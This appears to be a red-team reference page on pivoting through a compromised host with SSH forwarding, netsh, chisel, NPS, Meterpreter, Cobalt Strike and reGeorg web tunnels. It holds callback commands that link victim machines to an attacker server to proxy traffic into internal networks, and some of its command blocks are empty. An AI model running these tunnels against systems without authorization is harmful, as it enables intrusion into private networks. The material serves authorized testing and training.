

Local port forwarding

In local port forwarding, a port on the local system (usually attacking machine) is routed to a port on a remote server. For example, a compromised Internet facing server exposing a SSH service could be used to route traffic to the SMB ports of internal servers to conduct PsExec like connections directly from the attacking system without the need to deploy tools on the compromised server.

For instance, if using SSH tunneling, the SSH client will listen on the specified port (locally) and will tunnel any connection to that port to the specified port on the remote SSH server. The remote SSH server then connects to a port on the destination machine which can be the remote SSH server itself or any other machine accessible from the remote SSH server.

Remote port forwarding

Conceptually similar to the local port forwarding, the remote port forwarding can however be used for the opposite effect. Indeed, in remote port forwarding, the forwarding service will open a listening port on the server and will route any connection received on this port to the configured host and port.

For instance, if using SSH tunneling, the SSH server will listen on the specified port and will tunnel any connection to that port to the specified port on the local SSH client. The local SSH client then connects to a port on the destination machine, which can be the local machine (i.e the machine running the SSH client) or any other machine accessible from the local machine.

Dynamic ports forwarding

Contrary to local and remote port forwarding, dynamic ports forwarding allows for the complete tunneling of full IP and ports range. Thus, dynamic ports forwarding can be used to pivot into the internal network from a compromised host and access any servers and their services.

In dynamic port forwarding, the forwarding service will serve as a proxy, routing all connections to their destination, and a utility such as proxychains will be used to redirect tools connections to the listening forwarding service proxy port.

SOCKS proxy pivots

SOCKS is an Internet protocol that performs at Layer 5 of the Open Systems Interconnection model (OSI model) and exchanges network packets between a client and a server through a proxy server. Practically, a SOCKS service proxies TCP / (in some case) UDP connections to an arbitrary IP address and can thus be used on a compromised system to route traffic from the C2 servers to internal hosts, effectively transforming the compromise system in a pivot.

SOCKS proxies can only forward TCP, and, for the socks5 proxy following the current Request for comment (RFC) specifications, UDP traffic.

These restrictions may impose specific tuning of tools in order for an use through a SOCKS proxy. For instance, nmap should be used with the following options to run a ports / services scan through a SOCKS proxy: nmap -n -Pn -sT [...].

Commands network traffic an be proxied through a SOCKS proxy service using proxychains on Linux:

# Specification of the HTTP/HTTPS proxy address in /etc/proxychains.conf or passed as argument to proxychains using the CLI "-f" option.

# Execution of commands through proxychains.
proxychains [...]

On Windows, the Proxifier graphical utility can be used to tunnel specific processes network traffic through a SOCKS proxy:

# SOCKS proxy settings configuration
Profile -> Proxy Servers... -> Add -> Specification of the SOCKS proxy configuration: Address, Port and Protocol (SOCKS Version 5 or SOCKS Version 4) -> Ok
An authentication may also be specified and the proxy status and availability checked by establishing a connection and trying to reach www.google.com:80 through the proxy server.

# Processes specification
Profile -> Proxification Rules... -> Add -> Specification of the processes and proxy server: Applications, Target hosts / ports, Action (Proxy server) -> Enabled should be checked (by default) -> Ok

Additionally, a SOCKS proxy can be specified through the Internet Options (settings used by the Internet Explorer, Edge, and Chrome web browsers) graphical utility and set as the system-wide Microsoft Windows HTTP Services (WinHTTP) proxy using netsh.

Control Panel -> Internet Options -> Connections -> LAN settings
  "Use a proxy server for your LAN [...]" checked
  (Optional) "Bypass proxy server for local addresses" checked
  Advanced -> Socks: < | SOCKS_PROXY_IP> <SOCKS_PROXY_PORT>

netsh winhttp import proxy source=ie

# Lists the configured proxies.
netsh winhttp dump
  set proxy proxy-server="socks=<SOCKS_PROXY_IP>:<SOCKS_PROXY_PORT>" bypass-list="<local>"

# Restore the WinHTTP default proxy settings (no proxies).
netsh winhttp reset proxy

The proxy can also be directly set in the registry, for instance using PowerShell:

# Enables the proxy server.
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t REG_DWORD /d 1 /f
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name "ProxyEnable" -Value 1

# Set the proxy server to the specified server.
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyServer" /t REG_SZ /d "<IP>:<PORT>" /f
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -name "ProxyServer" -Value "<IP>:<PORT>"

# If needs be, set the proxy server to use the specified (remote) PAC file.
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -name "AutoConfigURL" -Value "<http | https>://<URL>"

Note that however both methods prove to be unreliable to proxy PowerShell cmdlets network traffic through the SOCKS proxy (while some cmdlets, such as Invoke-Command and Enter-PSSession can be reliably proxied through a system-wide HTTP / HTTPS proxy).

In metasploit, the setg Proxies socks4:< | IP>:<SOCKS_PROXY_PORT> command can be used to tunnel modules through a SOCKS proxy.

Pivoting with built-in utilities

[Linux] SSH

SSH port forwarding is a mechanism that allows for connection tunneling through a SSH service.

They are three main types of SSH port forwarding: local port forwarding, remote port forwarding and dynamic port forwarding.

SSH local port forwarding

The following command can be used to configure a local port forwarding through an SSH service:

# -n: no keyboard input to be expected (redirects stdin from /dev/null, actually preventing reading from stdin)
# -N & -T: prevents the opening of a tty session and specify that no command be executed


Once the above command is completed, the specified target port will be accessible locally on the attacking machine at the <LOCAL_PORT>.

Note: local port forwarding can be used to access locally (localhost) exposed services on the SSH server.

SSH remote port forwarding

The following command can be used to configure a remote port forwarding through an SSH service:

# By default the bind address will be localhost on the remote SSH, even if all interfaces are specified.
# The SSHD daemon configuration (/etc/ssh/sshd_config) should be updated to allow client specified binding: GatewayPorts clientspecified


SSH dynamic ports forwarding

The following commands can be used to configure the SSH service in proxy mode and redirect tools connections through it:


[Windows] netsh

On Windows, the netsh built-in can be used to configure unitary port forwarding.

As stated in the Microsoft KB555744, "the [portproxy add v4tov4] command is sent to the IPV6MON.DLL helper, and because of that it will work only if IPv6 protocol is installed."

# Display current configured port forwarding rule
netsh interface portproxy show all

# Configure a local port forwarding
netsh interface portproxy add v4tov4 listenaddress=<LHOST> listenport=<LPORT> connectaddress=<RHOST> connectport=<RPORT>

[Linux] iptables


Pivoting with fully-fledged tools or C2 agents

[Linux / Windows] Chisel

Recommended fully-fledged tool for its ease of use if no C2 is being used.

Chisel is a fast TCP / UDP encapsulation Go tool that transport SSH-encrypted traffic over HTTP. It supports mutual client / server authentication and numerous user-experience features (client auto-reconnects, multiple tunnel over one TCP connection, etc.).

# Generic server-side usage (on the attacking machine).
# Defaults to listening on all interfaces on port TCP 8080.
# Option --reverse: allow clients to specify reverse port forwarding (required for remote port forwarding and SOCKS proxy with "R:" in <REMOTE>).
# Option --socks / --socks5: allow clients to access the internal SOCKS5 proxy.
chisel server [--host < | SERVER_IP>] [-p <8080 | PORT>] [--reverse --socks5] [<OPTIONS>]

# Generic client-side usage (on the target machine).
# <REMOTE> represents a local / remote port forward or SOCKS proxy (detailed below)
chisel client <SERVER_IP>:<SERVER_PORT> <REMOTE>[/<TCP | UPD>]

# If required, for example in enterprise environments, an HTTP CONNECT or SOCKS5 proxy can be specified using the --proxy option.
# To date, NTLM authentication on proxy is not supported by chisel: https://github.com/jpillora/chisel/issues/149
chisel client --proxy <http | socks>://<USERNAME>:<PASSWORD>@<PROXY_SERVER>:<PROXY_PORT> <SERVER_IP>:<SERVER_PORT> <REMOTE>[/<TCP | UPD>]

Chisel local port forwarding

Local port forwarding to make accessible the service from the server on <SERVER_FORWARDED_IP>:<SERVER_FORWARDED_PORT> to the client on <CLIENT_TUNNEL_IP>:<CLIENT_TUNNEL_PORT>. <SERVER_FORWARDED_IP> can be localhost or any IP or host such as a host exposing a website on the Internet.

# chisel server-side (on the attacking machine).
chisel server [--host < | IP>] [-p <8080 | PORT>]

# chisel client-side (on the target machine).
# By default the port is opened client-side on all interfaces (<CLIENT_TUNNEL_IP> = with a local (client-side) port matching the one of the forwarded service (<CLIENT_TUNNEL_PORT> = <SERVER_FORWARDED_PORT>).
# Example: www.github.com:443 (<SERVER_FORWARDED_PORT>:<SERVER_FORWARDED_PORT>) to make GitHub accessible on the compromised client.

Chisel remote port forwarding

Remote port forwarding to forward traffic received server-side on <SERVER_TUNNEL_IP>:<SERVER_TUNNEL_PORT> to <REMOTE_HOST>:<REMOTE_PORT> through the client. <REMOTE_HOST> can be localhost or any IP such as one accessible in the internal network from the compromised client.

# chisel server-side (on the attacking machine).
chisel server [--host < | IP>] [-p <8080 | PORT>] --reverse

# chisel client-side (on the target machine).
# By default the port is opened server-side on localhost (<SERVER_HOST> = with a local (server-side) port matching the one the traffic is routed to (<REMOTE_PORT> = <SERVER_TUNNEL_PORT>).

Chisel SOCKS proxy

Establish a SOCKS proxy that can be used server-side to channel traffic through the compromised client:

# chisel server-side (on the attacking machine).
chisel server [--host < | IP>] [-p <8080 | PORT>] --reverse --socks5

# chisel client-side (on the target machine).
# By default the SOCKS proxy listen server-side on (<SERVER_TUNNEL_IP>:<SERVER_TUNNEL_PORT>).
chisel client <SERVER_IP>:<SERVER_PORT> R:socks

Refer to the Overview - SOCKS proxy pivots paragraph above for more information on how to make use of the SOCKS proxy, using proxychains or through metasploit.


NPS is a high-performance proxy server suite, analogous to a C2 framework, with cross-platforms agents and a web management interface. It supports numerous network protocols: socks5, http proxy, tcp, udp, http(s), etc. NPS additionally implements multiple extension functions, such as client authentication and network compression and encryption, and can display connected clients usage information (real-time bandwidth, total volume of data exchanged, etc.).

Through an established connection of a client to the server, multiple proxies services can be started (both socks5 and HTTP proxies for a given client for example).

Before use, the configuration file of NPS, in /etc/nps/conf/nps.conf on a default Linux installation, should be edited to securely restrict the access to the web management interface:

# The default credentials are admin:123 with the web interface being exposed on all network interfaces

# If the web management interface must be reachable over the network, it is recommended to enforce the use of the SSL / TLS protocol

Server startup and initial client connection to the server:

# Server side
nps start / restart

# A client must first be configured through the web management interface in order to receive a client callback.
URL of the web management interface: (by default).
Client -> + Add -> Eventual configuration of client basic auth and network compression / encryption -> v Add

The "Unique verify key" is needed for the client callback.
The callback command may be copied directly (as displayed after clicking on the "+" sign in front of the client).

# Client side
# ./npc on Linux or npc.exe on Windows.
npc -server=<IP>:<8024 : SERVER_BRIDGE_PORT> -vkey=<UNIQUE_VERIFY_KEY> -type=tcp

Once a client has established a session with the server, the following pivoting functions can be configured through the web management interface:

  • Unitary port forwarding using the TCP or UDP menus

  • HTTP or SOCKS5 proxies using the HTTP proxy or SOCKS 5 menus

For instance, the procedure to deploy a SOCKS5 proxy on the compromised system is as follow:

SOCKS 5 -> + Add -> Specification of the client ID and the local system proxy port <SOCKS_PROXY_PORT> -> v Add

Refer to the Overview - SOCKS proxy pivots paragraph above for more information on how to make use of the SOCKS proxy, using proxychains or through metasploit.

[Linux / Windows] xct's xc

xc is a reverse shell for Linux and Windows written in Go that include, among others, local / remote ports forwarding functionalities. xc can be used for basic port forward scenarios.

Refer to the [General] Shells note ([Linux / Windows] xct's xc section) for more information on the xc reverse shell utility.

[Linux / Windows] Meterpreter

Meterpreter's unitary port forwarding

The portfwd command from within the meterpreter shell can be used to forward TCP connections through a compromised machine.

portfwd [add | delete | list | flush] [args]

# List active port forwards
portfwd list

# Add port forward
portfwd add –l <LOCAL_PORT> –p <REMOTE_PORT> –r <REMOTE_HOST>

# Delete specific port forward
portfw delete -i <INDEX>

# Delete all port forwards
portfw flush

Meterpreter's dynamic port forwarding

Contrary to unitary port forwarding, dynamic port forwarding allows for the complete tunneling of full IP and ports range. The autoroute command from within the meterpreter shell can be used to forward TCP connections through a compromised machine.


[Windows] Cobalt Strike

Cobalt Strike supports the following pivoting mechanisms:

  • Ports forwarding

  • Pivot listeners

  • Dynamic ports forwarding through a SOCKS proxy

  • VPN access

Cobalt Strike's pivot listeners

Cobalt Strike's pivot listeners are listeners started on compromised systems to chain beacons communication in an internal Information System (IS). The pivot listener will serve as a pass-through between further beacons and the C2 listeners in order to minimize the number of beacons connections to the C2 servers or compromise systems that couldn't otherwise reach the C2 servers.

A pivot listener can be started on a beacon using the beacon built-in function [beacon] -> Pivoting -> Listeners....

As of now, pivot listeners can only be of type windows\beacon_reverse_tcp and do not support stager payloads.

Note that the functionally does not automatically update the system host-based firewall configuration and a manual modification of the firewall rules may be necessary in order to allow inbound traffic on the listener port.

Cobalt Strike's SOCKS proxy

A SOCKS4 proxy service can be started on a beacon using the beacon built-in function [beacon] -> Pivoting -> SOCKS Server or through the beacon CLI using socks <C2_LOCAL_SOCK_PORT>.

The actives SOCKS4 proxies can be viewed and managed through the View -> Proxy Pivots interface. All the SOCKS4 proxies running on a beacon can also be stopped directly through the beacon CLI using socks <SOCK_PORT>.

Refer to the Overview - SOCKS proxy pivots paragraph above for more information on how to make use of the SOCKS proxy, using proxychains or through metasploit.

Cobalt Strike's CovertVPN

This feature does not work on Windows 10 systems. Require Administrator privileges on the compromised system.

The Cobalt Strike CovertVPN feature is a layer 2 pivoting capability that deploy a network interface on the C2 server and bridge it, through a running beacon, to a compromised system network. While the traffic can be channeled over the TCP, HTTP and ICMP protocols, the use of the UDP protocol is recommended for performance optimization.

A CovertVPN pivot can be started on a beacon using the beacon built-in function [beacon] -> Pivoting -> Deploy VPN or through the beacon CLI using covertvpn <INTERFACE_NAME> <BEACON_IP_NETWORK>. If the Clone host MAC address option is checked, the network interface deployed on the C2 server will have the same MAC address as the compromised system network interface.

The actives CovertVPN pivots can be viewed and managed through the Cobalt Strike -> VPN Interfaces menu.

Once up and running, the network interface on the C2 server will require further configuration, such as specifying an IP address, in order to reach the network it is attached to. This configuration may be done either automatically through the Dynamic Host Configuration Protocol (DHCP) protocol, if a DHCP server is reachable on the network, or manually.

# Verification of the presence of the CovertVPN network interface on the C2 server

# Automatic configuration of the CovertVPN network interface using the internal DHCP server

# Manual setting of an IP address and default gateway, can be used if a DHCP server is not available or for a more covert approach
# The beacon network interface information can be retrived using the "run ipconfig" command
# Specifying a default gateway for the network interface is needed to reach systems outside of the (Virtual) Local Area Network ((V)LAN)  
ifconfig <INTERFACE_NAME> <IP> netmask < | NETWORK_NETMASK> up
ip route add default via <IP> dev <INTERFACE_NAME>

Pivoting over Web TCP tunnel

reGeorg and ABPTTS can be used to act as socks proxies and tunnel TCP traffic over an HTTP / HTTPS connection made to a web application. A web page / package must be deployed and executed by the web server, in similar fashion as a classical web shell.


reGeorg supports the following web application / languages:

  • ashx

  • aspx

  • js

  • jsp

  • php

  • tomcat jsp

Once the page / package is deployed, reGeorg socks server can be started:

python reGeorgSocksProxy.py -p <LOCAL_SOCKS_PROXY_PORT> -u <http | https>://<HOSTNAME | IP>/<PATH>/<tunnel.xx>

Refer to the Overview - SOCKS proxy pivots paragraph above for more information on how to make use of the SOCKS proxy, using proxychains or through metasploit.

Last updated